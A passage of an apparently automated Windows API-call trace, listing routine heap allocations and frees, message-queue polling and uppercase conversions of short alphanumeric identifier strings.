Flags=0x0, Size=0x1) returned 0x24b1438 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0254.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf4a4) returned 0x34b2250 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0254.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0254.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.486] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0254.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.487] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.488] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.489] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.489] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.489] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.489] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.490] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.490] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.490] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.490] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.490] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.491] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.491] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.492] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.492] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.492] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.492] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.492] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.492] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.493] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.493] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.493] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.494] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.494] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.494] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.495] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.495] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 